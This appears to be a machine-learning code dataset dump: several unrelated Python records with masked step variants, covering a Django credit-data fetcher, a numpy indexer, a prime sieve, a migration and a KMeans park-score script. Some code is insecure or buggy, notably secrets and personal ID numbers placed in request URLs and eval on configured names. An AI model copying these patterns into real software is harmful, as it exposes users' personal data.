#如果是外键就用一个嵌套的格式来表示 (嵌套就没必要再用path定位了吧,默认就是当前路径)\n \"name\" : \"Receiver\"\n\n \"req_call_cnt/data_type\" : \"list\"\n\n \"version\" : True,\n \"trans\": {\n \"name\" : \"name\",\n \"phone_num_list\" : \"phone_num_list\",\n \"amount\" : \"amount\",\n \"count\" : \"count\",\n },\n },\n\n },\n },\n }\n '''\n pass\n\n def test(self,user,data):\n if not data:\n return ERR_GET_RAW_DATA_FAILED\n ret_code = self._save_raw_data(data, user, self._options)\n\treturn ret_code\n\n def get_juxinli_data(self, uid, url):\n try:\n user = User.objects.get(pk=uid)\n token = self._get_token()\n if not token:\n return ERR_CREATE_TOKEN_FAILED\n data = self._get_juxinli_data(token, user, url)\n if not data:\n return ERR_GET_RAW_DATA_FAILED\n ret_code = self._save_raw_data(data, user, self._options)\n if ret_code != 0:\n return ret_code\n #data = self._get_report_data(token, user)\n #print data\n #print \"@@ print ret\", ret_code\n return RETURN_SUCCESS\n except Exception, e:\n traceback.print_exc()\n TkLog().error(\"get juxinli call failed %s\" % str(e))\n return ERR_OTHER_EXCEPTION\n\n def _open_url(self, url):\n '''\n get http request return json\n '''\n req1 = urllib2.Request(url=url)\n html = urllib2.urlopen(req1).read().decode('utf-8')\n return json.loads(html.encode(\"utf-8\"))\n\n def _get_token(self):\n '''\n 生成一个新的用来获取数据的token 失败返回None\n '''\n url = u\"%s?client_secret=%s&hours=24&org_name=%s\" % (self._access_report_token_api, self._client_secret, self._org_name)\n html = self._open_url(url)\n #if\n try:\n res = html['access_token']\n return res\n except KeyError, e:\n return None\n\n def _get_juxinli_data(self, access_token, user, url):\n '''\n 获取聚信力数据 返回json\n '''\n raw_url = u'%s?client_secret=%s&access_token=%s&name=%s&idcard=%s&phone=%s' % (url, self._client_secret, access_token, user.name, user.id_no, user.phone_no)\n #print raw_url\n try:\n res = self._open_url(raw_url.encode('utf-8'))\n # print res\n # print res['raw_data']['members']['error_msg']\n success = res[\"success\"]\n if success != \"true\":\n return None\n return res\n except KeyError, e:\n return None\n #def _get_report_data(self, access_token, user):\n # report_url = u'%s?client_secret=%s&access_token=%s&name=%s&idcard=%s&phone=%s' % (self._access_report_token_api, self._client_secret, access_token, user.name, user.id_no, user.phone_no)\n # print report_url\n # res = self._open_url(report_url.encode('utf-8'))\n # #print res\n # #print res['raw_data']['members']['error_msg']\n # return res\n\n def _allow_overwrite_data(self, user, options):\n return True\n\n def _get_data_from_path(self, data, path):\n '''\n path语法 / 分割路径 : 选择list中的序号\n '''\n try:\n fields = path.split(\"/\")\n #print fields\n res = data\n for field in fields:\n if field.find(\":\") != -1:\n parts = field.split(\":\")\n if len(parts) != 2:\n TkLog().error(\"field format error %s\" % (field))\n return None\n res = res[parts[0]][int(parts[1])]\n else:\n res = res[field]\n return res\n except Exception, e:\n print e\n traceback.print_exc()\n TkLog().error(\"get data from path failed %s\" % str(e))\n return None\n\n def _save_raw_data(self, data, user, options):\n \"\"\"\n 可以重入,一个用户的信息如果更新时间少于options.update_days天,不会更新db,否则添加记录\n \"\"\"\n if not self._allow_overwrite_data(user, options):\n return RETURN_CAN_NOT_OVERWRITE\n for transtype in self._transformer.keys():\n adaptor = self._transformer[transtype]\n cls = eval(adaptor[\"name\"])\n version = 0\n objs = cls.objects.filter(owner=user).order_by('-id')[:1]\n if len(objs) == 1:\n version = objs[0].version\n TkLog().info(\"update %s version %d\" % (adaptor[\"name\"], version))\n data_list = self._get_data_from_path(data, adaptor[\"path\"])\n if not data_list:\n TkLog().warn(\"data not found %s:%s\" % (adaptor[\"name\"], adaptor[\"path\"]))\n #return -4 #just skip\n\n ret_code = self._save_obj(data_list, cls, user, adaptor, version)\n if ret_code != 0:\n return ret_code\n return RETURN_SUCCESS\n\n\n @transaction.commit_manually\n def _save_obj(self, data_list, cls, user, adaptor, version=0, parent=None):\n\n '''\n 将一个对象写入数据库\n 根据data_type来判断是map还是list\n '''\n if adaptor[\"data_type\"] == \"list\": #data_list是列表数据\n\n for record in data_list:\n\n ret_code = self._save_single_obj(record, cls, user, adaptor, version, parent)\n if ret_code != 0:\n return ret_code\n elif adaptor[\"data_type\"] == \"map\": #data_list是单条数据\n\n record = data_list\n\n ret_code = self._save_single_obj(record, cls, user, adaptor, version, parent)\n if ret_code != 0:\n return ret_code\n transaction.commit()\n return 0\n\n def _save_single_obj(self, record, cls, user, adaptor, version = 0, parent=None):\n '''\n 将一个条目写入数据库,如果parent不为空,还需要设置parent的外键\n record : 单条json数据条目\n cls : 数据库Model\n '''\n obj = cls()\n for source_field, dest_field in adaptor['trans'].items():\n if isinstance(dest_field,str):\n field_type = obj._meta.get_field(dest_field)\n if \"/\" in source_field:\n record[source_field] = self._get_data_from_path(record,source_field)\n if isinstance(field_type, models.CharField):\n try:\n if isinstance(record[source_field],list):\n\n #setattr(obj, dest_field, \"#\".join(record[source_field]))\n setattr(obj, dest_field, record[source_field][0])\n else:\n setattr(obj, dest_field, record[source_field])\n except Exception, e:\n TkLog().warn(\"set char field failed %s %s\" % (str(e), record[source_field]))\n return ERR_SETATTR_FAILED\n elif isinstance(field_type, models.IntegerField):\n try:\n if not record[source_field]:\n setattr(obj, dest_field, 0)\n else:\n setattr(obj, dest_field, int(record[source_field]))\n except Exception, e:\n TkLog().warn(\"set int field failed %s %s\" % (str(e), record[source_field]))\n return ERR_SETATTR_FAILED\n elif isinstance(field_type, models.BigIntegerField):\n try:\n if not record[source_field]:\n setattr(obj, dest_field, 0)\n else:\n setattr(obj, dest_field, long(record[source_field]))\n except Exception, e:\n TkLog().warn(\"set bigint field failed %s %s\" % (str(e), record[source_field]))\n return ERR_SETATTR_FAILED\n elif isinstance(field_type, models.FloatField):\n try:\n if not record[source_field]:\n setattr(obj, dest_field, float(0))\n else:\n setattr(obj, dest_field, float(record[source_field]))\n except Exception, en:\n TkLog().warn(\"set float field failed %s %s\" % (str(e), record[source_field]))\n return ERR_SETATTR_FAILED\n elif isinstance(field_type, models.DateTimeField):\n try:\n if not record[source_field]:\n setattr(obj, dest_field, None)\n else:\n setattr(obj, dest_field, datetime.strptime(record[source_field], \"%Y-%m-%d %H:%M:%S\"))\n except Exception, e:\n TkLog().warn(\"set datetime field failed %s %s\" % (str(e), record[source_field]))\n return ERR_SETATTR_FAILED\n elif isinstance(field_type, models.NullBooleanField):\n try:\n if not record[source_field]:\n setattr(obj, dest_field, None)\n else:\n setattr(obj, dest_field, record[source_field])\n except Exception, e:\n TkLog().warn(\"set boolean field failed %s %s\" % (str(e), record[source_field]))\n\n return ERR_SETATTR_FAILED\n else:\n TkLog().error(\"unsupported type field:%s\" % dest_field)\n return ERR_UNSUPPORTED_FILED_TYPE\n try:\n\n if adaptor['version']:\n obj.version = version + 1\n else:\n obj.version = 0\n #if parent:\n #setattr(obj, parent[\"field\"], parent[\"parent_obj\"])\n\n obj.owner = user\n obj.save()\n except Exception, e:\n print \"save error %s\" % str(e)\n return ERR_SAVE_OBJECT\n\n for source_field, dest_field in adaptor['trans'].items():\n if isinstance(dest_field,dict):\n try:\n sub_cls = eval(dest_field[\"name\"])\n self._save_obj(record[source_field], sub_cls, obj, dest_field, version, {\"parent_obj\":obj, \"field\":\"owner\"})\n except Exception, e:\n\n TkLog().warn(\"set foreignkey field failed %s %s\" % (str(e), record[source_field]))\n objgraph.show_most_common_types()\n\treturn 0\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class Growable(object):
def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):
self.grow = grow
self.capacity = capacity
self.dtype = dtype
self.arr = numpy.empty((self.capacity,), dtype=self.dtype)
self.size = 0
<|reserved_special_token_0|>
def __len__(self):
return self.size
def update(self, other):
n = len(other)
self.__grow_to__(self.size + n)
self.arr[self.size:self.size + n] = other
self.size += n
def finalize(self):
return self.arr[:self.size]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Growable(object):
def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):
self.grow = grow
self.capacity = capacity
self.dtype = dtype
self.arr = numpy.empty((self.capacity,), dtype=self.dtype)
self.size = 0
def __grow_to__(self, total):
if self.capacity >= total:
return
else:
while self.capacity < total:
self.capacity *= self.grow
new = numpy.empty((self.capacity,), dtype=self.dtype)
new[:self.size] = self.arr[:self.size]
self.arr = new
def __len__(self):
return self.size
def update(self, other):
n = len(other)
self.__grow_to__(self.size + n)
self.arr[self.size:self.size + n] = other
self.size += n
def finalize(self):
return self.arr[:self.size]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Growable(object):
def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):
self.grow = grow
self.capacity = capacity
self.dtype = dtype
self.arr = numpy.empty((self.capacity,), dtype=self.dtype)
self.size = 0
def __grow_to__(self, total):
if self.capacity >= total:
return
else:
while self.capacity < total:
self.capacity *= self.grow
new = numpy.empty((self.capacity,), dtype=self.dtype)
new[:self.size] = self.arr[:self.size]
self.arr = new
def __len__(self):
return self.size
def update(self, other):
n = len(other)
self.__grow_to__(self.size + n)
self.arr[self.size:self.size + n] = other
self.size += n
def finalize(self):
return self.arr[:self.size]
def ixifyfile(file, vocab=None):
even = True
arr = Growable()
for sentence in read_file(file):
six = numpy.array([vocab.get(word) for word in sentence], dtype=
numpy.uint32)
if not even:
six |= B
even = not even
arr.update(six)
return arr.finalize(), even
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import numpy
import multiprocessing
from functools import partial
from textutil.text import read_file
from textutil.util import B
import mmap
import tqdm
class Growable(object):
def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):
self.grow = grow
self.capacity = capacity
self.dtype = dtype
self.arr = numpy.empty((self.capacity,), dtype=self.dtype)
self.size = 0
def __grow_to__(self, total):
if self.capacity >= total:
return
else:
while self.capacity < total:
self.capacity *= self.grow
new = numpy.empty((self.capacity,), dtype=self.dtype)
new[:self.size] = self.arr[:self.size]
self.arr = new
def __len__(self):
return self.size
def update(self, other):
n = len(other)
self.__grow_to__(self.size + n)
self.arr[self.size:self.size + n] = other
self.size += n
def finalize(self):
return self.arr[:self.size]
def ixifyfile(file, vocab=None):
even = True
arr = Growable()
for sentence in read_file(file):
six = numpy.array([vocab.get(word) for word in sentence], dtype=
numpy.uint32)
if not even:
six |= B
even = not even
arr.update(six)
return arr.finalize(), even
def ixifyfiles(ixfile, files, vocab):
ixf = partial(ixifyfile, vocab=vocab)
even = True
files = list(files)
with open(ixfile, 'wb') as ixhandle:
with multiprocessing.Pool(8) as pool:
for arr, i_even in tqdm.tqdm(pool.imap_unordered(ixf, files),
total=len(files)):
if even:
ixhandle.write(arr.tobytes())
else:
ixhandle.write((arr ^ B).tobytes())
even = not i_even ^ even
<|reserved_special_token_1|>
import numpy
import multiprocessing
from functools import partial
from textutil.text import read_file
from textutil.util import B
import mmap
import tqdm
class Growable(object):
def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):
self.grow = grow
self.capacity=capacity
self.dtype=dtype
self.arr = numpy.empty((self.capacity,), dtype=self.dtype)
self.size = 0
def __grow_to__(self, total):
if self.capacity >= total:
return
else:
while self.capacity < total:
self.capacity *= self.grow
new = numpy.empty((self.capacity,), dtype=self.dtype)
new[:self.size] = self.arr[:self.size]
self.arr = new
def __len__(self):
return self.size
def update(self, other):
n = len(other)
self.__grow_to__(self.size + n)
self.arr[self.size : self.size+n] = other
self.size += n
def finalize(self):
return self.arr[:self.size]
def ixifyfile(file, vocab=None):
even = True
arr = Growable()
for sentence in read_file(file):
six = numpy.array([vocab.get(word) for word in sentence], dtype=numpy.uint32)
if not even:
six |= B
even = not even
arr.update(six)
return arr.finalize(), even
def ixifyfiles(ixfile, files, vocab):
ixf = partial(ixifyfile, vocab=vocab)
even = True
files = list(files)
with open(ixfile, 'wb') as ixhandle:
with multiprocessing.Pool(8) as pool:
for arr, i_even in tqdm.tqdm(pool.imap_unordered(ixf, files), total=len(files)):
if even:
ixhandle.write(arr.tobytes())
else:
ixhandle.write((arr ^ B).tobytes())
even = not (i_even ^ even)
|
flexible
|
{
"blob_id": "8a2fe83ab1adae7de94eb168290ce4843ab39fe1",
"index": 9476,
"step-1": "<mask token>\n\n\nclass Growable(object):\n\n def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):\n self.grow = grow\n self.capacity = capacity\n self.dtype = dtype\n self.arr = numpy.empty((self.capacity,), dtype=self.dtype)\n self.size = 0\n <mask token>\n\n def __len__(self):\n return self.size\n\n def update(self, other):\n n = len(other)\n self.__grow_to__(self.size + n)\n self.arr[self.size:self.size + n] = other\n self.size += n\n\n def finalize(self):\n return self.arr[:self.size]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Growable(object):\n\n def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):\n self.grow = grow\n self.capacity = capacity\n self.dtype = dtype\n self.arr = numpy.empty((self.capacity,), dtype=self.dtype)\n self.size = 0\n\n def __grow_to__(self, total):\n if self.capacity >= total:\n return\n else:\n while self.capacity < total:\n self.capacity *= self.grow\n new = numpy.empty((self.capacity,), dtype=self.dtype)\n new[:self.size] = self.arr[:self.size]\n self.arr = new\n\n def __len__(self):\n return self.size\n\n def update(self, other):\n n = len(other)\n self.__grow_to__(self.size + n)\n self.arr[self.size:self.size + n] = other\n self.size += n\n\n def finalize(self):\n return self.arr[:self.size]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Growable(object):\n\n def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):\n self.grow = grow\n self.capacity = capacity\n self.dtype = dtype\n self.arr = numpy.empty((self.capacity,), dtype=self.dtype)\n self.size = 0\n\n def __grow_to__(self, total):\n if self.capacity >= total:\n return\n else:\n while self.capacity < total:\n self.capacity *= self.grow\n new = numpy.empty((self.capacity,), dtype=self.dtype)\n new[:self.size] = self.arr[:self.size]\n self.arr = new\n\n def __len__(self):\n return self.size\n\n def update(self, other):\n n = len(other)\n self.__grow_to__(self.size + n)\n self.arr[self.size:self.size + n] = other\n self.size += n\n\n def finalize(self):\n return self.arr[:self.size]\n\n\ndef ixifyfile(file, vocab=None):\n even = True\n arr = Growable()\n for sentence in read_file(file):\n six = numpy.array([vocab.get(word) for word in sentence], dtype=\n numpy.uint32)\n if not even:\n six |= B\n even = not even\n arr.update(six)\n return arr.finalize(), even\n\n\n<mask token>\n",
"step-4": "import numpy\nimport multiprocessing\nfrom functools import partial\nfrom textutil.text import read_file\nfrom textutil.util import B\nimport mmap\nimport tqdm\n\n\nclass Growable(object):\n\n def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):\n self.grow = grow\n self.capacity = capacity\n self.dtype = dtype\n self.arr = numpy.empty((self.capacity,), dtype=self.dtype)\n self.size = 0\n\n def __grow_to__(self, total):\n if self.capacity >= total:\n return\n else:\n while self.capacity < total:\n self.capacity *= self.grow\n new = numpy.empty((self.capacity,), dtype=self.dtype)\n new[:self.size] = self.arr[:self.size]\n self.arr = new\n\n def __len__(self):\n return self.size\n\n def update(self, other):\n n = len(other)\n self.__grow_to__(self.size + n)\n self.arr[self.size:self.size + n] = other\n self.size += n\n\n def finalize(self):\n return self.arr[:self.size]\n\n\ndef ixifyfile(file, vocab=None):\n even = True\n arr = Growable()\n for sentence in read_file(file):\n six = numpy.array([vocab.get(word) for word in sentence], dtype=\n numpy.uint32)\n if not even:\n six |= B\n even = not even\n arr.update(six)\n return arr.finalize(), even\n\n\ndef ixifyfiles(ixfile, files, vocab):\n ixf = partial(ixifyfile, vocab=vocab)\n even = True\n files = list(files)\n with open(ixfile, 'wb') as ixhandle:\n with multiprocessing.Pool(8) as pool:\n for arr, i_even in tqdm.tqdm(pool.imap_unordered(ixf, files),\n total=len(files)):\n if even:\n ixhandle.write(arr.tobytes())\n else:\n ixhandle.write((arr ^ B).tobytes())\n even = not i_even ^ even\n",
"step-5": "import numpy\nimport multiprocessing\nfrom functools import partial\nfrom textutil.text import read_file\nfrom textutil.util import B\nimport mmap\nimport tqdm\n\n\n\nclass Growable(object):\n def __init__(self, capacity=1024, dtype=numpy.uint32, grow=2):\n self.grow = grow\n self.capacity=capacity\n self.dtype=dtype\n self.arr = numpy.empty((self.capacity,), dtype=self.dtype)\n self.size = 0\n\n def __grow_to__(self, total):\n if self.capacity >= total:\n return\n else:\n while self.capacity < total:\n self.capacity *= self.grow\n new = numpy.empty((self.capacity,), dtype=self.dtype)\n new[:self.size] = self.arr[:self.size]\n self.arr = new\n\n def __len__(self):\n return self.size\n\n\n def update(self, other):\n n = len(other)\n self.__grow_to__(self.size + n)\n self.arr[self.size : self.size+n] = other\n self.size += n\n\n def finalize(self):\n return self.arr[:self.size]\n\n\ndef ixifyfile(file, vocab=None):\n even = True\n arr = Growable()\n for sentence in read_file(file):\n six = numpy.array([vocab.get(word) for word in sentence], dtype=numpy.uint32)\n if not even:\n six |= B\n even = not even\n arr.update(six)\n return arr.finalize(), even\n\n\ndef ixifyfiles(ixfile, files, vocab):\n ixf = partial(ixifyfile, vocab=vocab)\n even = True\n files = list(files)\n with open(ixfile, 'wb') as ixhandle:\n with multiprocessing.Pool(8) as pool:\n for arr, i_even in tqdm.tqdm(pool.imap_unordered(ixf, files), total=len(files)):\n if even:\n ixhandle.write(arr.tobytes())\n else:\n ixhandle.write((arr ^ B).tobytes())\n even = not (i_even ^ even)\n",
"step-ids": [
5,
6,
7,
9,
10
]
}
|
[
5,
6,
7,
9,
10
] |
def erato(n):
m = int(n ** 0.5)
sieve = [True for _ in range(n+1)]
sieve[1] = False
for i in range(2, m+1):
if sieve[i]:
for j in range(i+i, n+1, i):
sieve[j] = False
return sieve
input()
l = list(map(int, input().split()))
max_n = max(l)
prime_l = erato(max_n)
ans = 0
for i in l:
if prime_l[i]:
ans += 1
print(ans)
|
normal
|
{
"blob_id": "28eb1d7a698480028fb64827746b3deec0f66a9a",
"index": 6224,
"step-1": "<mask token>\n",
"step-2": "def erato(n):\n m = int(n ** 0.5)\n sieve = [(True) for _ in range(n + 1)]\n sieve[1] = False\n for i in range(2, m + 1):\n if sieve[i]:\n for j in range(i + i, n + 1, i):\n sieve[j] = False\n return sieve\n\n\n<mask token>\n",
"step-3": "def erato(n):\n m = int(n ** 0.5)\n sieve = [(True) for _ in range(n + 1)]\n sieve[1] = False\n for i in range(2, m + 1):\n if sieve[i]:\n for j in range(i + i, n + 1, i):\n sieve[j] = False\n return sieve\n\n\ninput()\n<mask token>\nfor i in l:\n if prime_l[i]:\n ans += 1\nprint(ans)\n",
"step-4": "def erato(n):\n m = int(n ** 0.5)\n sieve = [(True) for _ in range(n + 1)]\n sieve[1] = False\n for i in range(2, m + 1):\n if sieve[i]:\n for j in range(i + i, n + 1, i):\n sieve[j] = False\n return sieve\n\n\ninput()\nl = list(map(int, input().split()))\nmax_n = max(l)\nprime_l = erato(max_n)\nans = 0\nfor i in l:\n if prime_l[i]:\n ans += 1\nprint(ans)\n",
"step-5": "def erato(n):\n m = int(n ** 0.5)\n sieve = [True for _ in range(n+1)]\n sieve[1] = False\n\n for i in range(2, m+1):\n if sieve[i]:\n for j in range(i+i, n+1, i):\n sieve[j] = False\n return sieve\n\ninput()\nl = list(map(int, input().split()))\nmax_n = max(l)\nprime_l = erato(max_n)\nans = 0\nfor i in l:\n if prime_l[i]:\n ans += 1\nprint(ans)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('KYusers', '0017_caprofile_regs')]
operations = [migrations.AddField(model_name='message', name=
'mard_read', field=models.BooleanField(default=False)), migrations.
AlterField(model_name='caprofile', name='regs', field=models.
ManyToManyField(blank=True, related_name='regs', to=
'KYusers.KYProfile'))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('KYusers', '0017_caprofile_regs')]
operations = [migrations.AddField(model_name='message', name=
'mard_read', field=models.BooleanField(default=False)), migrations.
AlterField(model_name='caprofile', name='regs', field=models.
ManyToManyField(blank=True, related_name='regs', to=
'KYusers.KYProfile'))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-10-28 17:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('KYusers', '0017_caprofile_regs'),
]
operations = [
migrations.AddField(
model_name='message',
name='mard_read',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='caprofile',
name='regs',
field=models.ManyToManyField(blank=True, related_name='regs', to='KYusers.KYProfile'),
),
]
|
flexible
|
{
"blob_id": "12c3fe8a3ca1e660eeb90b16eca17eddd47e5de7",
"index": 7124,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('KYusers', '0017_caprofile_regs')]\n operations = [migrations.AddField(model_name='message', name=\n 'mard_read', field=models.BooleanField(default=False)), migrations.\n AlterField(model_name='caprofile', name='regs', field=models.\n ManyToManyField(blank=True, related_name='regs', to=\n 'KYusers.KYProfile'))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('KYusers', '0017_caprofile_regs')]\n operations = [migrations.AddField(model_name='message', name=\n 'mard_read', field=models.BooleanField(default=False)), migrations.\n AlterField(model_name='caprofile', name='regs', field=models.\n ManyToManyField(blank=True, related_name='regs', to=\n 'KYusers.KYProfile'))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.8 on 2016-10-28 17:08\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('KYusers', '0017_caprofile_regs'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='message',\n name='mard_read',\n field=models.BooleanField(default=False),\n ),\n migrations.AlterField(\n model_name='caprofile',\n name='regs',\n field=models.ManyToManyField(blank=True, related_name='regs', to='KYusers.KYProfile'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.db import models
class Book(models.Model):
title = models.TextField(max_length=32, blank=False, null=False)
# from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin, BaseUserManager
#
#
# class UserAccountManager(BaseUserManager):
# def create_user(self, email, firstname,lastname, phonenumber, password=None,):
#
# if not email:
# raise ValueError('Users must have an email address')
# email = self.normalize_email(email)
# user = self.model(email=email, name=firstname)
# user.set_password(password)
# user.save()
#
# class UserAccount(AbstractBaseUser, PermissionsMixin):
# email = models.EmailField(max_length=255, unique=True)
# firstname = models.CharField(max_length=255)
# lastname = models.CharField(max_length=255)
# is_active = models.BooleanField(default=True)
# is_staff = models.BooleanField(default=True)
#
# objects = UserAccountManager()
#
# USERNAME_FILED = 'email'
# REQUIRED_FIELDS = ['firstname','lastname','phonenumber']
#
# def get_full_name(self):
# return self.firstname + " " + self.lastname
#
# def get_short_name(self):
# return self.firstname
#
# def __str__(self):
# return self.email
|
normal
|
{
"blob_id": "8286407987301ace7af97d6acdcf6299ce3d8525",
"index": 5440,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Book(models.Model):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Book(models.Model):\n title = models.TextField(max_length=32, blank=False, null=False)\n",
"step-4": "from django.db import models\n\n\nclass Book(models.Model):\n title = models.TextField(max_length=32, blank=False, null=False)\n",
"step-5": "from django.db import models\n\n\nclass Book(models.Model):\n title = models.TextField(max_length=32, blank=False, null=False)\n\n# from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin, BaseUserManager\n#\n#\n# class UserAccountManager(BaseUserManager):\n# def create_user(self, email, firstname,lastname, phonenumber, password=None,):\n#\n# if not email:\n# raise ValueError('Users must have an email address')\n# email = self.normalize_email(email)\n# user = self.model(email=email, name=firstname)\n# user.set_password(password)\n# user.save()\n#\n# class UserAccount(AbstractBaseUser, PermissionsMixin):\n# email = models.EmailField(max_length=255, unique=True)\n# firstname = models.CharField(max_length=255)\n# lastname = models.CharField(max_length=255)\n# is_active = models.BooleanField(default=True)\n# is_staff = models.BooleanField(default=True)\n#\n# objects = UserAccountManager()\n#\n# USERNAME_FILED = 'email'\n# REQUIRED_FIELDS = ['firstname','lastname','phonenumber']\n#\n# def get_full_name(self):\n# return self.firstname + \" \" + self.lastname\n#\n# def get_short_name(self):\n# return self.firstname\n#\n# def __str__(self):\n# return self.email\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import numpy as np
import pandas as pd
import geopandas as gp
from sklearn.cluster import KMeans
import shapely
from descartes import PolygonPatch
# -- load the data
data = pd.read_csv('/scratch/share/gdobler/parqa/output/Tables/'
'ParkQualityScores/QualityArea_ZipCode_FiscalYears.csv')
zips = gp.GeoDataFrame.from_file('/scratch/share/gdobler/parqa/output/'
'ShapeData/ZIPCODE_Modified_Final.shp')
# -- prepare the data
cols = ['F2{0:03}'.format(i) for i in range(4,16)]
vals = data[cols].values
vals -=vals[:,np.newaxis].mean(-1)
vals /=vals[:,np.newaxis].std(-1)
# -- cluster
km = KMeans(n_clusters=5)
km.fit(vals)
# -- assign clusters to zips
zips['cluster'] = np.zeros(len(zips),dtype=int)-1
dzips = [i for i in data.ZIPCODE]
for ii in range(len(zips)):
tzip = int(zips.ZIPCODE[ii])
if tzip in dzips:
zips['cluster'][ii] = km.labels_[dzips.index(tzip)]
# -- assign color
zips['color'] = np.zeros(len(zips),dtype=str)
for tcluster in range(km.n_clusters):
print("tcluster = " + str(tcluster))
zips['color'][zips['cluster']==tcluster] = 'red'
zips['color'][zips['cluster']!=tcluster] = 'none'
# -- plot
close('all')
yrs = range(2004,2016)
fig, ax = plt.subplots(1,2,figsize=[10,5])
fig.set_facecolor('white')
ax[1].set_xlim([-74.26,-74.26+0.6])
ax[1].set_ylim([40.4,40.4+0.6])
ax[1].axis('off')
for ii in range(len(zips)):
geo = zips['geometry'][ii]
tzip = zips.ZIPCODE[ii]
if type(geo)==shapely.geometry.polygon.Polygon:
ax[1].add_patch(PolygonPatch(geo,fc=zips['color'][ii],
linewidth=0.2))
ax[0].plot(yrs,vals[km.labels_==tcluster].T,color='k',lw=0.1)
ax[0].plot(yrs,km.cluster_centers_[tcluster],color='indianred')
ax[0].set_title('Cluster {0}'.format(tcluster))
fig.canvas.draw()
fig.savefig('../Outputs/cluster_{0}_{1}.png'.format(tcluster,
km.n_clusters),
clobber=True)
|
normal
|
{
"blob_id": "2c181a33c84ce262404c192abdc515924a1916a9",
"index": 6165,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nvals -= vals[:, np.newaxis].mean(-1)\nvals /= vals[:, np.newaxis].std(-1)\n<mask token>\nkm.fit(vals)\n<mask token>\nfor ii in range(len(zips)):\n tzip = int(zips.ZIPCODE[ii])\n if tzip in dzips:\n zips['cluster'][ii] = km.labels_[dzips.index(tzip)]\n<mask token>\nfor tcluster in range(km.n_clusters):\n print('tcluster = ' + str(tcluster))\n zips['color'][zips['cluster'] == tcluster] = 'red'\n zips['color'][zips['cluster'] != tcluster] = 'none'\n close('all')\n yrs = range(2004, 2016)\n fig, ax = plt.subplots(1, 2, figsize=[10, 5])\n fig.set_facecolor('white')\n ax[1].set_xlim([-74.26, -74.26 + 0.6])\n ax[1].set_ylim([40.4, 40.4 + 0.6])\n ax[1].axis('off')\n for ii in range(len(zips)):\n geo = zips['geometry'][ii]\n tzip = zips.ZIPCODE[ii]\n if type(geo) == shapely.geometry.polygon.Polygon:\n ax[1].add_patch(PolygonPatch(geo, fc=zips['color'][ii],\n linewidth=0.2))\n ax[0].plot(yrs, vals[km.labels_ == tcluster].T, color='k', lw=0.1)\n ax[0].plot(yrs, km.cluster_centers_[tcluster], color='indianred')\n ax[0].set_title('Cluster {0}'.format(tcluster))\n fig.canvas.draw()\n fig.savefig('../Outputs/cluster_{0}_{1}.png'.format(tcluster, km.\n n_clusters), clobber=True)\n",
"step-3": "<mask token>\ndata = pd.read_csv(\n '/scratch/share/gdobler/parqa/output/Tables/ParkQualityScores/QualityArea_ZipCode_FiscalYears.csv'\n )\nzips = gp.GeoDataFrame.from_file(\n '/scratch/share/gdobler/parqa/output/ShapeData/ZIPCODE_Modified_Final.shp')\ncols = ['F2{0:03}'.format(i) for i in range(4, 16)]\nvals = data[cols].values\nvals -= vals[:, np.newaxis].mean(-1)\nvals /= vals[:, np.newaxis].std(-1)\nkm = KMeans(n_clusters=5)\nkm.fit(vals)\nzips['cluster'] = np.zeros(len(zips), dtype=int) - 1\ndzips = [i for i in data.ZIPCODE]\nfor ii in range(len(zips)):\n tzip = int(zips.ZIPCODE[ii])\n if tzip in dzips:\n zips['cluster'][ii] = km.labels_[dzips.index(tzip)]\nzips['color'] = np.zeros(len(zips), dtype=str)\nfor tcluster in range(km.n_clusters):\n print('tcluster = ' + str(tcluster))\n zips['color'][zips['cluster'] == tcluster] = 'red'\n zips['color'][zips['cluster'] != tcluster] = 'none'\n close('all')\n yrs = range(2004, 2016)\n fig, ax = plt.subplots(1, 2, figsize=[10, 5])\n fig.set_facecolor('white')\n ax[1].set_xlim([-74.26, -74.26 + 0.6])\n ax[1].set_ylim([40.4, 40.4 + 0.6])\n ax[1].axis('off')\n for ii in range(len(zips)):\n geo = 